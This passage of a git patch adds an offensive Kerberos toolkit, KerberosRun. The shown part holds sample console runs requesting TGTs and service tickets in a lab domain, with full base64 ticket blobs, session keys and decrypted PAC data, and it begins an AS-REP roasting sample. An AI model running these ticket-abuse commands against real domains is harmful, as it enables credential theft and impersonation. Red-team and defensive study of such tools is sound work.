From 1ff3d8f6f2495ab65d0d07269625f477c03e9050 Mon Sep 17 00:00:00 2001
From: dev-2null <dev-2null@hotmail.com>
Date: Wed, 27 May 2020 19:31:19 +0800
Subject: [PATCH] KerberosRun Preview

---
 Authentication/Samples/AskTGS.md              |  326 ++++
 Authentication/Samples/AskTGT.md              |  102 ++
 Authentication/Samples/Asreproast.md          |   46 +
 Authentication/Samples/Golden.md              |  168 +++
 Authentication/Samples/Kerberoast.md          |  205 +++
 Authentication/Samples/S4U.md                 |  499 +++++++
 Authentication/Samples/S4U2Self.md            |  387 +++++
 Authentication/Samples/Sliver.md              |  168 +++
 KerberosRun/KerberosRun.sln                   |   24 +
 KerberosRun/KerberosRun/ASK.cs                |  948 ++++++++++++
 KerberosRun/KerberosRun/BuildTicket.cs        |  201 +++
 KerberosRun/KerberosRun/Commands.cs           |  299 ++++
 KerberosRun/KerberosRun/FodyWeavers.xml       |    3 +
 KerberosRun/KerberosRun/FodyWeavers.xsd       |  111 ++
 KerberosRun/KerberosRun/KerberosRun.csproj    |  103 ++
 KerberosRun/KerberosRun/Kirbi.cs              |  407 +++++
 KerberosRun/KerberosRun/KrbConstants.cs       |  102 ++
 KerberosRun/KerberosRun/Options.cs            |  188 +++
 KerberosRun/KerberosRun/Pac.cs                |  235 +++
 KerberosRun/KerberosRun/PrintFunc.cs          |  844 +++++++++++
 KerberosRun/KerberosRun/Program.cs            |   36 +
 .../KerberosRun/Properties/AssemblyInfo.cs    |   26 +
 KerberosRun/KerberosRun/S4U.cs                |  545 +++++++
 KerberosRun/KerberosRun/Utils/Interop.cs      | 1318 +++++++++++++++++
 .../KerberosRun/Utils/KerberosHashCreds.cs    |   55 +
 KerberosRun/KerberosRun/Utils/LSA.cs          |  326 ++++
 KerberosRun/KerberosRun/Utils/LUID.cs         |   83 ++
 KerberosRun/KerberosRun/Utils/Utils.cs        |   83 ++
 KerberosRun/KerberosRun/app.config            |   15 +
 KerberosRun/KerberosRun/packages.config       |   15 +
 KerberosRun/README.md                         |   36 +
 NOTICES                                       |   17 +
 README.md                                     |  111 +-
 33 files changed, 7995 insertions(+), 37 deletions(-)
 create mode 100644 Authentication/Samples/AskTGS.md
 create mode 100644 Authentication/Samples/AskTGT.md
 create mode 100644 Authentication/Samples/Asreproast.md
 create mode 100644 Authentication/Samples/Golden.md
 create mode 100644 Authentication/Samples/Kerberoast.md
 create mode 100644 Authentication/Samples/S4U.md
 create mode 100644 Authentication/Samples/S4U2Self.md
 create mode 100644 Authentication/Samples/Sliver.md
 create mode 100644 KerberosRun/KerberosRun.sln
 create mode 100644 KerberosRun/KerberosRun/ASK.cs
 create mode 100644 KerberosRun/KerberosRun/BuildTicket.cs
 create mode 100644 KerberosRun/KerberosRun/Commands.cs
 create mode 100644 KerberosRun/KerberosRun/FodyWeavers.xml
 create mode 100644 KerberosRun/KerberosRun/FodyWeavers.xsd
 create mode 100644 KerberosRun/KerberosRun/KerberosRun.csproj
 create mode 100644 KerberosRun/KerberosRun/Kirbi.cs
 create mode 100644 KerberosRun/KerberosRun/KrbConstants.cs
 create mode 100644 KerberosRun/KerberosRun/Options.cs
 create mode 100644 KerberosRun/KerberosRun/Pac.cs
 create mode 100644 KerberosRun/KerberosRun/PrintFunc.cs
 create mode 100644 KerberosRun/KerberosRun/Program.cs
 create mode 100644 KerberosRun/KerberosRun/Properties/AssemblyInfo.cs
 create mode 100644 KerberosRun/KerberosRun/S4U.cs
 create mode 100644 KerberosRun/KerberosRun/Utils/Interop.cs
 create mode 100644 KerberosRun/KerberosRun/Utils/KerberosHashCreds.cs
 create mode 100644 KerberosRun/KerberosRun/Utils/LSA.cs
 create mode 100644 KerberosRun/KerberosRun/Utils/LUID.cs
 create mode 100644 KerberosRun/KerberosRun/Utils/Utils.cs
 create mode 100644 KerberosRun/KerberosRun/app.config
 create mode 100644 KerberosRun/KerberosRun/packages.config
 create mode 100644 KerberosRun/README.md
 create mode 100644 NOTICES

diff --git a/Authentication/Samples/AskTGS.md b/Authentication/Samples/AskTGS.md
new file mode 100644
index 0000000..9664e19
--- /dev/null
+++ b/Authentication/Samples/AskTGS.md
@@ -0,0 +1,326 @@
+```powershell
+PS C:\Users> .\KerberosRun.exe --asktgs --user normaluser --pass [...] --spn time/win10.corplab.local --verbose --decrypttgs [...] --decryptetype aes256 --srvname adminuser
+
+   __           __
+  / /_____ ____/ /  ___ _______  ___ ______ _____
+ /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
+/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/
+
+  v1.0.0
+[*] Starting Kerberos Authentication ...
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  normaluser
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261653
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  normaluser
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261654
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[*] Receiving AS-REP...
+    * MessageType :  KRB_AS_REP
+    * pvno :  5
+    * PaData :
+       - PA_ETYPE_INFO2 :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - S2kParams :
+          - Salt :  CORPLAB.LOCALnormaluser
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_PRINCIPAL
+       - Name :  normaluser
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  krbtgt
+          - Type :  NT_SRV_INST
+       - EncryptedPart :
+          - kvno :  11
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [krbtgtEncryptedCipher...]
+    * Enc-Part :
+       - kvno :  6
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - Cipher :  [ClientEncryptedCipher...]
+[+] TGT Kirbi:
+    - doIFHDCCBRigAwIBBaEDAgEWooIEHDCCBBhhggQUMIIEEKADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUNPUlBMQUIuTE9DQUyjggPSMIIDzqADAgESoQMCAQuiggPABIIDvG9wWD+OtdyeCC9I4lqm6NMpC0TzTujqRNM60OHw51mlP6tl1yiWS26gJ+ckwTghD6OP7wWcRff8XrIQi303d4BIpO3+asp29Zk1may9VKMUwqNPoFov9zc8eO7M6OTQxH6gBY4aLNd2y/livA55wFW3E+gBWMzvQ5ctKsyhzecAT3XOjH5uURHGTaA+4OwEoCyvKfywy10qhEfR5uo0S4pXWq2spp9DmlrPn+qXoeAtAHkgc4ugsWhsWF96aUoy0ZgpyPrH6afRo30kN5+EO/029ie+HcuuXvBzoFCiDVfuNQHlnpBeg5XOfr5h9KSwBdBXGQq+aGoJV/Rc4++FrUvjpDI9+4E3m90dH87pevnCAFHrU1l+YSF0BgFumIhUadasAVs1ELp1kJ6p08yd8qZOb/fw2m09Ru+ToMxp0xlh++/IkakqqoADDilxrCnhUZtCfnppKuAwoggPupIZGro3J0YV8beEioArRfHr5fZWBv/o2s4idA/Qn4kogb/uQmb4HIVqi/6nXXKmpO3UxE7qtWQteSGb+VCRaFHkdWsNbEm8OXkU74GJtRKc/iD2QkpB0mdl9cl38yvu7e5+cCSw2wXr2DcAHiLzay/MNbP+kuaspjpbVFz6YunNDzV7QUfuwaeMPsakCHTuQ1qGKfnayCNTvTuwLhY3ROXqED2yXB6CflxKWS1RogUUKMheNuVCTUvXkuEehn8fcBJOcLp/XApJSj704b4J8W2YJ3QZJsFuVsBGXI8IodzRmNGvw3BMNSl3dWBpP4ur2hLUBGAxhyFiElc7Da1hNHQdGan7Rcl/DKPhdvrTVTpmCoOEPVhWbJKptrqgSe3tmquZloSyu28//JqSF/58lKx2Hxyp9L/hpovsbuJaucvmeUkJciT6mBKHvk0+c4OrPHSyrrNP/fsJo4IHRBMtVXiP2WEJKrsYkTxYZ5kB39i9SxnIxhDoREd9d5bz0kZ6zET6lF7D54NbaHv8Y6izRzyt2JlRbR2uXVzTMtOr3LoOu3UJW0yf7batnf6ZQSKSDE4ez7gfEBZXDHhFhFkiae08/cgIk/qZd3Ijr3SkhSaaktXbTqeLI4r9URbcY7N1phFJOzmy4CuGk2X8gFBepY21F7s9UQJCHqjRzlqEOlPspYf6UxurgcIRq10KuS7WTZAY1debbiI/7NRQ2G+heeqmmOrrGyTAKWpvJVPRZWiZzO6MzuKYgOBgSmq8twiSxNoL/R019h/qpus48gQzOQpchBjGQ6WJT/ReJFD6VGVlo4HrMIHooAMCAQCigeAEgd19gdowgdeggdQwgdEwgc6gKzApoAMCARKhIgQgzkMboQVwYSHS19ZADYZ32x1nJh6ubF1OlC++rN/9hU2hDxsNQ09SUExBQi5MT0NBTKIXMBWgAwIBAaEOMAwbCm5vcm1hbHVzZXKjBwMFAEDBAAClERgPMjAyMDA1MjcwODM0MTJaphEYDzIwMjAwNTI3MTgzNDEyWqcRGA8yMDIwMDYwMzA4MzQxMlqoDxsNQ09SUExBQi5MT0NBTKkiMCCgAwIBAqEZMBcbBmtyYnRndBsNQ09SUExBQi5MT0NBTA==
+[*] Sending TGS-REQ ...
+    * MessageType :  KRB_TGS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_TGS_REQ :
+          - KRB_AP_REQ :
+             - pvno :  5
+             - ApOptions :  Reserved
+             - Ticket :
+                - tkt-vno :  5
+                - Realm :  CORPLAB.LOCAL
+                - SName :
+                   - Type :  NT_SRV_INST
+                   - Name :  krbtgt
+                   - Name :  CORPLAB.LOCAL
+                - EncryptedPart :
+                   - kvno :  11
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - Cipher :  [krbtgtEncryptedCipher...]
+             - Authenticator :
+                - kvno :
+                - EType :  AES256_CTS_HMAC_SHA1_96
+                - Realm :  CORPLAB.LOCAL
+                - SequenceNumber :  637261656
+                - Subkey :
+                   - EType :  AES256_CTS_HMAC_SHA1_96
+                   - KeyValue :  23E8CB62AD98396C032A76845F3EEC24EA828082CC98F76D4B0E0947C10DE85E
+                - CTime :  5/27/2020 8:34:12 AM +00:00
+                - CuSec :  810
+                - CName :
+                   - Type :  NT_PRINCIPAL
+                   - Name :  normaluser
+                - Checksum :
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Checksum :  D8389B6B07E8793C11B7FEC3
+                - AuthorizationData :
+                - AuthenticatorVersionNumber :  5
+       - PA_PAC_OPTIONS :
+          - Flags :  BranchAware
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - Realm :  corplab.local
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  time
+          - Name :  win10.corplab.local
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :
+       - Nonce :  637261655
+       - EType :
+          - EncType :  RC4_HMAC_NT
+       - EncAuthorizationData :
+       - From :
+       - AdditionalTickets :
+[*] Receiving TGS-REP ...
+    * MessageType :  KRB_TGS_REP
+    * pvno :  5
+    * PaData :
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_PRINCIPAL
+       - Name :  normaluser
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  time
+          - Type :  NT_SRV_INST
+       - EncryptedPart :
+          - kvno :  5
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [ServiceEncryptedCipher...]
+    * Enc-Part :
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - kvno :
+       - Cipher :  [SubSessionKeyEncryptedCipher..]
+    * [Decrypted Enc-Part]:
+       - AuthTime :  5/27/2020 8:34:12 AM +00:00
+       - StartTime :  5/27/2020 8:34:12 AM +00:00
+       - EndTime :  5/27/2020 6:34:12 PM +00:00
+       - RenewTill :  6/3/2020 8:34:12 AM +00:00
+       - Nonce :  637261655
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  time
+          - Name :  win10.corplab.local
+       - EncryptedPaData :
+          - PA_SUPPORTED_ETYPES :
+             - Value : 1F000000
+          - PA_PAC_OPTIONS :
+             - Flags :  BranchAware
+       - Key :
+          - EType :  RC4_HMAC_NT
+          - Value :  4C76CFB5C06C436BD30E203D00C5CAEF
+       - KeyExpiration :
+       - Flags :  EncryptedPreAuthentication, Renewable, Forwardable
+       - LastReq
+          - Type :  0
+          - Type :  5/27/2020 8:34:12 AM +00:00
+    * [Decrypted Ticket Enc-Part]:
+       - AuthTime :  5/27/2020 8:34:12 AM +00:00
+       - StartTime :  5/27/2020 8:34:12 AM +00:00
+       - EndTime :  5/27/2020 6:34:12 PM +00:00
+       - RenewTill :  6/3/2020 8:34:12 AM +00:00
+       - CRealm :  CORPLAB.LOCAL
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  normaluser
+       - AuthorizationData :
+          - Type :  AdIfRelevant
+             - Type :  AdWin2kPac
+                - Type :  AdWin2kPac
+                - Version :  0
+                - LogonInfo :
+                   - PacType :
+                   - DomainId :
+                      - Revision :  1
+                      - IdentifierAuthority :  NTAuthority
+                      - SubAuthority :  21, 1977317821, 1772133574, 954835042
+                      - SubAuthorityCount :  4
+                   - ExtraIds :
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Sid :  S-1-18-1
+                      - Revision :  1
+                      - IdentifierAuthority :  AuthenticationAuthority
+                      - SubAuthority :  1
+                      - SubAuthorityCount :  1
+                   - DomainSid :
+                      - Attributes :  0
+                      - Id :  954835042
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042
+                   - ExtraSidCount :  1
+                   - ExtraSids :
+                      - Id :  1
+                      - Attributes :  0
+                      - Value :  S-1-18-1
+                   - GroupCount :  1
+                   - GroupId :  513
+                   - GroupIds :
+                      - RelativeId :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                   - GroupSid :  S-1-5-21-1977317821-1772133574-954835042-513
+                   - GroupSids :
+                      - Id :  513
+                      - Attributes :  SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
+                      - Value :  S-1-5-21-1977317821-1772133574-954835042-513
+                   - HomeDirectory :
+                   - HomeDrive :
+                   - KickOffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LastFailedILogon :  1/1/1601 12:00:00 AM +00:00
+                   - LastSuccessfulILogon :  1/1/1601 12:00:00 AM +00:00
+                   - LogoffTime :  1/1/0001 12:00:00 AM +00:00
+                   - LogonCount :  397
+                   - LogonScript :
+                   - LogonTime :  5/27/2020 8:34:12 AM +00:00
+                   - ProfilePath :
+                   - PwdCanChangeTime :  5/1/2020 3:58:59 AM +00:00
+                   - PwdLastChangeTime :  4/30/2020 3:58:59 AM +00:00
+                   - PwdMustChangeTime :  1/1/0001 12:00:00 AM +00:00
+                   - Reserved1 :  0, 0
+                   - Reserved3 :  0
+                   - ResourceDomainId :
+                   - ResourceDomainSid :
+                   - ResourceGroupCount :  0
+                   - ResourceGroupIds :
+                   - ResourceGroups :
+                   - SubAuthStatus :  0
+                   - UserAccountControl :  ADS_UF_LOCKOUT, ADS_UF_DONT_EXPIRE_PASSWD
+                   - UserDisplayName :
+                   - UserFlags :  LOGON_EXTRA_SIDS
+                   - UserId :  1607
+                   - UserName :  normaluser
+                   - UserSessionKey :  00000000000000000000000000000000
+                   - UserSid :  S-1-5-21-1977317821-1772133574-954835042-1607
+                   - DomainName :  CORP
+                   - ServerName :  DC1
+                   - BadPasswordCount :  0
+                   - FailedILogonCount :  0
+                - ClientInformation :
+                   - PacType :  CLIENT_NAME_TICKET_INFO
+                   - ClientId :  5/27/2020 8:34:12 AM +00:00
+                   - Name :  normaluser
+                   - NameLength :  20
+                - KdcSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  3945EBABAECF5A1D97FBA860
+                   - SignatureData :  [...]
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  3945EBABAECF5A1D97FBA860
+                - ServerSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  5E71809C20696561C147D5DD
+                   - SignatureData :  [...]
+                   - Type :  HMAC_SHA1_96_AES256
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  5E71809C20696561C147D5DD
+                - UpnDomainInformation :
+                   - PacType :  UPN_DOMAIN_INFO
+                   - Upn :  normaluser@corplab.local
+                   - UpnLength :  48
+                   - UpnOffset :  16
+                   - Domain :  CORPLAB.LOCAL
+                   - DnsDomainNameLength :  26
+                   - DnsDomainNameOffset :  64
+                - DecodingErrors :
+                - HasRequiredFields :  True
+       - CAddr :
+       - Flags :  EncryptedPreAuthentication, Renewable, Forwardable
+       - Key :
+          - EType :  RC4_HMAC_NT
+          - Value :  4C76CFB5C06C436BD30E203D00C5CAEF
+       - Transited :
+          - Type :  DomainX500Compress
+          - Contents :
+[+] TGS Kirbi:
+    - doIFBDCCBQCgAwIBBaEDAgEWooIEEDCCBAxhggQIMIIEBKADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiJjAkoAMCAQKhHTAbGwR0aW1lGxN3aW4xMC5jb3JwbGFiLmxvY2Fso4IDwjCCA76gAwIBEqEDAgEFooIDsASCA6wylVGOtQXK+t94IKXAaKeuN00l5M6bjit7CU9QDCnH6kBOYrpQljKvbnpX+E2MbkAJoV2BXjES7Xs/pPdYGkbuzyYckgF+cbsmRpd6z0vV82Aavl71mqoN9nDHG+jPFKtNe5iFC8Alri3cAJsEd/aO2m8w5U7T52bdUAH4mYp5pgAue2LFUOvY/s6TTe7l3xlR+tT4nhaYYaBafuV2lCAD8V75G8DZqixGg/rUyvRf0B50aphnaXOq7/E9oFug9zV7eQWbzXAsmdrCUkjgUJ337aW38YAUp3lDiBud4j+sZWknCqxN5dtEz0txVVBanvqrb8QphB7Gtpwz+DH2tpN9lohiesCjFxVL2uecN5vGmnnAzhROFH5PsVMrk5CPBlPviIDlZwaobzVxDU74jv/uo3l0AcsB4GvUpKw6zBR9DblRN23Apkor3muq0Xb4JKBrRwzsAeDOuI9zdueaziQZEdnaVw4TQHeglECVzEV4zjkC7WLT6OzsFNe1442E4FguHMB0o0zsyAj618kAIcDBxGplZaocOCC0FJnmdd5aB+r6yMloZFgS1RpZm0LDhT2g4e2iiZC1u4Co+J7cnuYqFUk4yIFfqJ3XEOj/fpE37rPybL1ZwOen+qf1iLoOlMDt7jqzBzl/xN3BBIozuavkk1WkIDd/tE9aE7s5bM2hramrtBwX77TNd55/QnLBKXcI1pVKgs/bsald/0+O3ji6XAB1N2dAsAQ8RH/3xrfWEEcac+NECu+6fWqGsLLsRleIY7ftbNtZaBEXR4FlO6uScH5tujnzKprp8rrcOLWYXXbxl9MqJV0khX0p19+dCbMNmjVCiNXQQahxpcj95dXzXqzfqgY6bzkiacdBjLUQOP9zS/seu9e4QC9DM81MYd5WrMk7QH8DSh36aqyBKwQmkdITr9cM/NPb7rvKQEsbP+C4H0xfSepW0n+8sY2ai3jR9xpJtgtN0YQiMFi1KgZbKBAuoRDmjpc5h3vIPAQMJq/Qwk2GbSJT8qXFMgA1lhXs8cQaevmrvqVqNzIW/7ttQKAj6UPY2iAXjVpU2uD1otDv3HE2FLYFoP9w9q1UoUWyiWxi4iNcDy2Q9yKd7N1qbaIL+WdaZV7BwtvkpK4kAKMcbFVgAEVu8wjRB9OI1xYNSrlytrqvVQXa3HpkJ9RM/ufzzb05EEADjK2tKpe9ngbr8lT1lNVeP4fsAOV5CJ9GCuWyU5T5aKTB1LCmEasqrNuwxpgMt0gJFx2Wo4HfMIHcoAMCAQCigdQEgdF9gc4wgcuggcgwgcUwgcKgGzAZoAMCARehEgQQTHbPtcBsQ2vTDiA9AMXK76EPGw1DT1JQTEFCLkxPQ0FMohcwFaADAgEBoQ4wDBsKbm9ybWFsdXNlcqMHAwUAQIEAAKURGA8yMDIwMDUyNzA4MzQxMlqmERgPMjAyMDA1MjcxODM0MTJapxEYDzIwMjAwNjAzMDgzNDEyWqgPGw1DT1JQTEFCLkxPQ0FMqSYwJKADAgECoR0wGxsEdGltZRsTd2luMTAuY29ycGxhYi5sb2NhbA==
+
+```
\ No newline at end of file
diff --git a/Authentication/Samples/AskTGT.md b/Authentication/Samples/AskTGT.md
new file mode 100644
index 0000000..ce2d619
--- /dev/null
+++ b/Authentication/Samples/AskTGT.md
@@ -0,0 +1,102 @@
+```powershell
+PS C:\Users> .\KerberosRun.exe --asktgt --user normaluser --pass [...] --verbose --decrypttgt [...] --decryptetype aes256
+
+   __           __
+  / /_____ ____/ /  ___ _______  ___ ______ _____
+ /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
+/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/
+
+  v1.0.0
+[*] Starting Kerberos Authentication ...
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  normaluser
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261652
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
+    * Body :
+       - KdcOptions :  RenewableOk, Canonicalize, Renewable, Forwardable
+       - CName :
+          - Type :  NT_PRINCIPAL
+          - Name :  normaluser
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Type :  NT_SRV_INST
+          - Name :  krbtgt
+          - Name :  CORPLAB.LOCAL
+       - Till :  9/13/2037 2:48:05 AM +00:00
+       - RTime :  9/13/2037 2:48:05 AM +00:00
+       - Nonce :  637261653
+       - EType :
+          - EncType :  AES256_CTS_HMAC_SHA1_96
+          - EncType :  AES128_CTS_HMAC_SHA1_96
+          - EncType :  RC4_HMAC_NT
+          - EncType :  RC4_HMAC_NT_EXP
+          - EncType :  RC4_HMAC_OLD_EXP
+       - Addresses :
+          - Type :  NetBios
+          - Addresses :  ADMINSTAT
+       - AdditionalTickets :
+       - EncAuthorizationData :
+       - From :
+[*] Receiving AS-REP...
+    * MessageType :  KRB_AS_REP
+    * pvno :  5
+    * PaData :
+       - PA_ETYPE_INFO2 :
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - S2kParams :
+          - Salt :  CORPLAB.LOCALnormaluser
+    * CRealm :  CORPLAB.LOCAL
+    * CName :
+       - Type :  NT_PRINCIPAL
+       - Name :  normaluser
+    * Ticket :
+       - tkt-vno :  5
+       - Realm :  CORPLAB.LOCAL
+       - SName :
+          - Name :  krbtgt
+          - Type :  NT_SRV_INST
+       - EncryptedPart :
+          - kvno :  11
+          - EType :  AES256_CTS_HMAC_SHA1_96
+          - Cipher :  [krbtgtEncryptedCipher...]
+    * Enc-Part :
+       - kvno :  6
+       - EType :  AES256_CTS_HMAC_SHA1_96
+       - Cipher :  [ClientEncryptedCipher...]
+[+] TGT Kirbi:
+    - doIFHDCCBRigAwIBBaEDAgEWooIEHDCCBBhhggQUMIIEEKADAgEFoQ8bDUNPUlBMQUIuTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUNPUlBMQUIuTE9DQUyjggPSMIIDzqADAgESoQMCAQuiggPABIIDvEfgVj/yxC+VZo7cNLOYuHHYY7w5VMPCOUEf2UgnY6UutVx3q16gLZDxShRGM5TxB4BZnN8wZQ4d8746tJJgeO2XUE1bBlLSGOk2Vn6ry9iMMr2KwJsW4Ch1ByRqcnwm9/ZQS/w2tl7jbSfPKBsnwqsXk8Q9PbrYnEicLD3RoRDF0N8t5xCnuNLUdqveuqu2yqbRiOfwrkMtnAaR25gUpD0b3YiZtLGzdqFwrpKKPzH+FyTfL8N93Gmb4VzRMsrjMmOaNipi7KbOyCQSK+ZFZK8iX8ffbqGCLxDQ8b8jATrfu9/C7coW4exwu9xgkv4A1eZ7RAynkEgYrZMs58lIDv1Q+xNj77IIjCzing57IRiy71Fiq9f4AObiILpg0mBX4CaGyU9DpqJdhmipTFCnS9Sng9qINkpPv1OrHnj7sNgrAvpHQiLYxL2CYJZj3pEEOxLovepyKyX+Qe6QkYiOsFerIM6lJtM3bmOCAdmrsVQBh6ZF1loy4/V8O4mn3kOGop1ZJFp+6yrejNBDejQ/anBJbcK7xP2ZuXcSaUUo5jalmKmWA+daur/hESjq43L6+mON5MwYZKqovJAJ9tgmnQGdnqxh/MKcPM9HkZXRW+2qeOKxS1mTzorBM6y1H44vVM0J8PiOCNnpShBKRcdu7Ba0znjQW7xF9ur4qoNfLrw45xORb8k4T6xe87IhHQus0vJmUtfV2eBYhb4ySB5msD3PKrdqqRa0NTFYp3jmpXTmMDKlE5x3oVtd6LYnLiiS/3Fn//g+ou97sqtFm2E+/o2j7vAxdQ3z5rcdREaNLVbUMdWIpUbdNIlrPXW6iS25RXVG6xtdl9T4HbxZWr1ef73H25hvdr4w91LgAQ/dfw1EGVJ4OL2mR3R7FYg2ze2WT9YhNOKyeM9iHckxgX44ZmUJacw4HpfYo14jDRpE5qIhNGwiI6KjSQ77rgNPWnWEtUz4zXpRg0DjIK7Wgav57b6dPtUo8w3Vd1pBu0On1IIaf/22/mDicA7/qlN2khAuExkZHkGhG7g76dZqrYzvmGakd9igWqqmoipYxyySMxPn5ekgF3k2XoFYkcc7dfqp9t8sTe53PUGCkjMjGYHOZT+hYw+caa1wWG4YDZHEW1TlHVc09d7UpM4qq/OSVyekKMgrmSHhJfJUJL8UJhrusl7ZLgQoTNIPkk7EQJhXACfXKe7STpIO7K7VI6YS4lTRX7grPdsulCfQP2iPnNVgEiXz8R9CHbCOJHrB07NrcDM3L9UfswPmn5R21sXbo4HrMIHooAMCAQCigeAEgd19gdowgdeggdQwgdEwgc6gKzApoAMCARKhIgQgr5OFtGEwifRTCuucwljGT/XIywbvuqiaAlHKwGryk0uhDxsNQ09SUExBQi5MT0NBTKIXMBWgAwIBAaEOMAwbCm5vcm1hbHVzZXKjBwMFAEDBAAClERgPMjAyMDA1MjcwODMyNTNaphEYDzIwMjAwNTI3MTgzMjUzWqcRGA8yMDIwMDYwMzA4MzI1M1qoDxsNQ09SUExBQi5MT0NBTKkiMCCgAwIBAqEZMBcbBmtyYnRndBsNQ09SUExBQi5MT0NBTA==
+
+```
\ No newline at end of file
diff --git a/Authentication/Samples/Asreproast.md b/Authentication/Samples/Asreproast.md
new file mode 100644
index 0000000..88c054d
--- /dev/null
+++ b/Authentication/Samples/Asreproast.md
@@ -0,0 +1,46 @@
+```powershell
+PS C:\Users> .\KerberosRun.exe --asreproast --user normaluser --verbose
+
+   __           __
+  / /_____ ____/ /  ___ _______  ___ ______ _____
+ /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
+/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/
+
+  v1.0.0
+[*] Starting Kerberos Authentication ...
+[*] Sending AS-REQ ...
+    * MessageType :  KRB_AS_REQ
+    * pvno :  5
+    * PaData :
+       - PA_PAC_REQUEST :
+          - IncludePac :  True
